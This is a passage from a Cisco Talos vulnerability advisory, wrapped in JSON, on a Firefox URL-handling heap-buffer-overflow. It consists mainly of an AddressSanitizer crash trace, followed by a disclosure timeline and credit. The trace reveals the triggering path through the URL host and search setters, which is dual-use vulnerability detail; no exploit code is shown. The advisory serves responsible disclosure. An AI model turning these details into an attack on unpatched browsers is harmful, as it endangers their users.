in __asan_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3\n \t#1 0x7fe0b9c225e1 in copy /builds/worker/workspace/obj-build/dist/include/nsCharTraits.h:314:9\n \t#2 0x7fe0b9c225e1 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:413:3\n \t#3 0x7fe0b9c0e447 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:381:7\n \t#4 0x7fe0ba19f266 in mozilla::net::nsStandardURL::SetPathQueryRef(nsTSubstring<char> const&) /builds/worker/checkouts/gecko/netwerk/base/nsStandardURL.cpp:2067:10\n \t#5 0x7fe0ba1a5b31 in mozilla::net::nsStandardURL::SetQueryWithEncoding(nsTSubstring<char> const&, mozilla::Encoding const*) /builds/worker/checkouts/gecko/netwerk/base/nsStandardURL.cpp:2737:30\n \t#6 0x7fe0c16219db in SetQuery /builds/worker/workspace/obj-build/dist/include/nsIURIMutator.h:568:25\n \t#7 0x7fe0c16219db in mozilla::dom::URL::SetSearchInternal(nsTSubstring<char16_t> const&) /builds/worker/checkouts/gecko/dom/url/URL.cpp:389:18\n \t#8 0x7fe0c162183d in mozilla::dom::URL::SetSearch(nsTSubstring<char16_t> const&) /builds/worker/checkouts/gecko/dom/url/URL.cpp:147:3\n \t#9 0x7fe0bea90f4f in mozilla::dom::URL_Binding::set_search(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/URLBinding.cpp:759:24\n \t#10 0x7fe0bf5ff2d1 in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3151:8\n \t#11 0x7fe0c5b20fc0 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:493:13\n \t#12 0x7fe0c5b20fc0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585:12\n \t#13 0x7fe0c5b2320d in InternalCall(JSContext*, js::AnyInvokeArgs const&, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:648:10\n \t#14 0x7fe0c5b235a0 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665:8\n \t#15 0x7fe0c5b252cb in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:803:10\n \t#16 0x7fe0c61061c1 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyResult>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2809:8\n \t#17 0x7fe0c61050d0 in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2838:14\n \t#18 0x7fe0c5b3cdf0 in js::SetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:283:10\n \t#19 0x7fe0c5b03485 in SetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:277:10\n \t#20 0x7fe0c5b03485 in Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3071:12\n \t#21 0x7fe0c5aeb205 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:465:10\n \t#22 0x7fe0c5b210ac in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:620:13\n \t#23 0x7fe0c5b2320d in InternalCall(JSContext*, js::AnyInvokeArgs const&, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:648:10\n \t#24 0x7fe0c5b235a0 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665:8\n \t#25 0x7fe0c5cbf2e2 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/jsapi.cpp:2840:10\n \t#26 0x7fe0bf2039e9 in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:276:37\n \t#27 0x7fe0bfd34d71 in void mozilla::dom::EventHandlerNonNull::Call<nsCOMPtr<mozilla::dom::EventTarget> >(nsCOMPtr<mozilla::dom::EventTarget> const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:367:12\n \t#28 0x7fe0bfd32f20 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12\n \t#29 0x7fe0bfcf7aae in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1088:22\n \t#30 0x7fe0bfcf913e in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1280:17\n \t#31 0x7fe0bfce787e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:356:17\n \t#32 0x7fe0bfce6083 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:558:16\n \t#33 0x7fe0bfcea3df in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1055:11\n \t#34 0x7fe0c217f782 in mozilla::PresShell::EventHandler::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8521:7\n \t#35 0x7fe0c217c9f4 in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8067:7\n \t#36 0x7fe0c2175515 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7999:17\n \t#37 0x7fe0c217a269 in mozilla::PresShell::EventHandler::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7907:17\n \t#38 0x7fe0bfc8676d in HandleEventWithTarget /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:650:25\n \t#39 0x7fe0bfc8676d in mozilla::EventStateManager::InitAndDispatchClickEvent(mozilla::WidgetMouseEvent*, nsEventStatus*, mozilla::EventMessage, mozilla::PresShell*, nsIContent*, AutoWeakFrame, bool, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:4961:29\n \t#40 0x7fe0bfc86dbf in mozilla::EventStateManager::DispatchClickEvents(mozilla::PresShell*, mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5063:17\n \t#41 0x7fe0bfc80a11 in mozilla::EventStateManager::PostHandleMouseUp(mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5006:17\n \t#42 0x7fe0bfc7d6fa in mozilla::EventStateManager::PostHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:3321:18\n \t#43 0x7fe0c217cc0a in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8091:30\n \t#44 0x7fe0c2175515 in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7999:17\n \t#45 0x7fe0c2174876 in mozilla::PresShell::EventHandler::HandleEventUsingCoordinates(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6936:30\n \t#46 0x7fe0c21729ba in mozilla::PresShell::EventHandler::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6741:12\n \t#47 0x7fe0c2171370 in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6666:23\n \t#48 0x7fe0c1ba9787 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/checkouts/gecko/view/nsViewManager.cpp:750:18\n \t#49 0x7fe0c1ba93e5 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/worker/checkouts/gecko/view/nsView.cpp:1133:9\n \t#50 0x7fe0c1c2cec9 in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/worker/checkouts/gecko/widget/PuppetWidget.cpp:381:37\n \t#51 0x7fe0bcde7249 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/worker/checkouts/gecko/gfx/layers/apz/util/APZCCallbackHelper.cpp:458:21\n \t#52 0x7fe0c138401b in DispatchWidgetEventViaAPZ /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1715:10\n \t#53 0x7fe0c138401b in mozilla::dom::BrowserChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1654:3\n \t#54 0x7fe0c13834b3 in mozilla::dom::BrowserChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1500:7\n \t#55 0x7fe0c13865d8 in mozilla::dom::BrowserChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1618:5\n \t#56 0x7fe0bbd5ba21 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PBrowserChild.cpp:5086:56\n \t#57 0x7fe0bb34e077 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8484:32\n \t#58 0x7fe0bb08e7a0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2186:25\n \t#59 0x7fe0bb08a1ba in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2110:9\n \t#60 0x7fe0bb08bfea in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1958:3\n \t#61 0x7fe0bb08cb58 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1989:13\n \t#62 0x7fe0b9e546a5 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1211:14\n \t#63 0x7fe0b9e5e6fc in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:501:10\n \t#64 0x7fe0bb0979d4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:109:5\n \t#65 0x7fe0baf9bae1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10\n \t#66 0x7fe0baf9bae1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3\n \t#67 0x7fe0baf9bae1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3\n \t#68 0x7fe0c1c559c7 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27\n \t#69 0x7fe0c58bc52f in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:909:20\n \t#70 0x7fe0baf9bae1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10\n \t#71 0x7fe0baf9bae1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3\n \t#72 0x7fe0baf9bae1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3\n \t#73 0x7fe0c58bbbd9 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:740:34\n \t#74 0x55a402cb3fed in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28\n \t#75 0x55a402cb4427 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:303:18\n \t#76 0x7fe0dceacb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310\n \t#77 0x55a402c08b19 in _start (/home/icewall/tools/fuzzing/browsers/firefox/firefox+0x59b19)\n \n 0x60300046b9c0 is located 0 bytes to the right of 32-byte region [0x60300046b9a0,0x60300046b9c0)\n allocated by thread T0 (file:// Content) here:\n \t#0 0x55a402c81afd in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3\n \t#1 0x7fe0b9c11cbd in Alloc /builds/worker/checkouts/gecko/xpcom/string/nsSubstring.cpp:206:42\n \t#2 0x7fe0b9c11cbd in nsTSubstring<char>::StartBulkWriteImpl(unsigned int, unsigned int, bool, unsigned int, unsigned int, unsigned int) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:203:32\n \t#3 0x7fe0b9c28f6e in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:304:43\n \t#4 0x7fe0b9c24193 in nsTSubstring<char>::ReplacePrep(unsigned int, unsigned int, unsigned int) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:292:10\n \t#5 0x7fe0b9c247a8 in nsTSubstring<char>::Replace(unsigned int, unsigned int, char const*, unsigned int, std::nothrow_t const&) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:648:13\n \t#6 0x7fe0b9c24538 in nsTSubstring<char>::Replace(unsigned int, unsigned int, char const*, unsigned int) /builds/worker/checkouts/gecko/xpcom/string/nsTSubstring.cpp:623:8\n \t#7 0x7fe0ba192648 in Replace /builds/worker/workspace/obj-build/dist/include/nsTSubstring.h:539:5\n \t#8 0x7fe0ba192648 in mozilla::net::nsStandardURL::ReplaceSegment(unsigned int, unsigned int, char const*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsStandardURL.cpp:1009:13\n \t#9 0x7fe0ba19e03b in mozilla::net::nsStandardURL::SetHost(nsTSubstring<char> const&) /builds/worker/checkouts/gecko/netwerk/base/nsStandardURL.cpp:1979:19\n \t#10 0x7fe0ba19d002 in mozilla::net::nsStandardURL::SetHostPort(nsTSubstring<char> const&) /builds/worker/checkouts/gecko/netwerk/base/nsStandardURL.cpp:1864:17\n \t#11 0x7fe0c16248cb in SetHostPort /builds/worker/workspace/obj-build/dist/include/nsIURIMutator.h:514:25\n \t#12 0x7fe0c16248cb in mozilla::dom::URL::SetHost(nsTSubstring<char16_t> const&) /builds/worker/checkouts/gecko/dom/url/URL.cpp:269:18\n \t#13 0x7fe0bea8f54f in mozilla::dom::URL_Binding::set_host(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/URLBinding.cpp:439:24\n \t#14 0x7fe0bf5ff2d1 in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3151:8\n \t#15 0x7fe0c5b20fc0 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:493:13\n \t#16 0x7fe0c5b20fc0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585:12\n \t#17 0x7fe0c5b2320d in InternalCall(JSContext*, js::AnyInvokeArgs const&, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:648:10\n \t#18 0x7fe0c5b235a0 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665:8\n \t#19 0x7fe0c5b252cb in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:803:10\n \t#20 0x7fe0c61061c1 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyResult>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2809:8\n \t#21 0x7fe0c61050d0 in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2838:14\n \t#22 0x7fe0c5b3cdf0 in js::SetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:283:10\n \t#23 0x7fe0c5b03485 in SetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:277:10\n \t#24 0x7fe0c5b03485 in Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3071:12\n \t#25 0x7fe0c5aeb205 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:465:10\n \t#26 0x7fe0c5b210ac in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:620:13\n \t#27 0x7fe0c5b2320d in InternalCall(JSContext*, js::AnyInvokeArgs const&, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:648:10\n \t#28 0x7fe0c5b235a0 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665:8\n \t#29 0x7fe0c5cbf2e2 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/jsapi.cpp:2840:10\n \t#30 0x7fe0bf2039e9 in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:276:37\n \t#31 0x7fe0bfd34d71 in void mozilla::dom::EventHandlerNonNull::Call<nsCOMPtr<mozilla::dom::EventTarget> >(nsCOMPtr<mozilla::dom::EventTarget> const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:367:12\n \t#32 0x7fe0bfd32f20 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12\n \t#33 0x7fe0bfcf7aae in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1088:22\n \t#34 0x7fe0bfcf913e in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1280:17\n \n SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy\n Shadow bytes around the buggy address:\n 0x0c06800856e0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa\n 0x0c06800856f0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00\n 0x0c0680085700: 00 fa fa fa 00 00 00 00 fa fa fd fd fd fd fa fa\n 0x0c0680085710: fd fd fd fd fa fa 00 00 00 fa fa fa 00 00 00 00\n 0x0c0680085720: fa fa fd fd fd fd fa fa 00 00 00 00 fa fa 00 00\n =>0x0c0680085730: 00 00 fa fa 00 00 00 00[fa]fa fa fa fa fa fa fa\n 0x0c0680085740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c0680085750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c0680085760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c0680085770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c0680085780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n ==61400==ABORTING\n \n\n### Timeline\n\n2020-05-27 - Vendor Disclosure \n2020-07-01 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1090\n\nPrevious Report\n\nTALOS-2020-1009\n", "edition": 6, "modified": "2020-07-01T00:00:00", "published": "2020-07-01T00:00:00", "id": "TALOS-2020-1088", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1088", "title": "Mozilla Firefox URL mPath Information Disclosure Vulnerability", "type": "talos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}